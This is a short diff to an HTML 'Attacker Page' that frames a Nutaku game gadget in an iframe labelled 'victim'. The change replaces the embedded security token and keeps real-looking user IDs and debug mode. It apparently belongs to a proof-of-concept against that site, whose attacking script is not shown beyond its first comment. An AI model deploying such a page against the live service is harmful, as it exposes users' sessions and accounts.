--- a/63826187321312836671273721.html
+++ b/63826187321312836671273721.html
@@ -7,7 +7,7 @@
 <body>
   <h2>Attacker Page</h2>
 
-  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=E8ECMxu%2FPHBIBWY%2Fw39Hl%2FDFsb9waGKiqQ1zZRdQ7W1SL09PGVozW66eRpNcAckpr7fkpTxUjYENpDe8m2hJiZZl2TDvwTsYt%2BK%2BPFB%2F7LvlrIfvQplh7isuLTCqo5FTsAWovqekjWl8IeeQSBAO0MQxTtaYpIEuSFWMOVf7pzuAKCtR4Fxoo4lv8bQZDamrH4Ld1h%2BiQyuW%2B4%2BRAQaNzDmgBv6dGFZhZx8pwHDfUjjbPLM%2FSQj%2BKbc39nRaxl8fCNJYAge7ohs3k3ASkuhVgJixIqs%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
+  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=8zsC%2FXgWXn0Ls8UnYjIoYZaCp093Dp46UwSjIhTV2Tv65RlaS9n8l5i0Eikal3xGXKHRBDSWQQUlmyaYJ83YQ5sC31aY8CKF5IvSAQyrz94amn5YO7DWgrfWQkzJ53sDvoLuC7BDkDvHCHnQpsIb3t2TvxBnJb6WE7S4R1Ip3wHilw0SIAtYO7HMec7ecMmDDL77dLt9cbodbt1rDKcVfKNX4Iofir40jGJ6cH8PN48jZQjcsg6VK%2BMY0SXGib4h8o9FmeO0fcxk3ProUmwus1srkJs%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
 
   <script>
     // Wait until the iframe loads
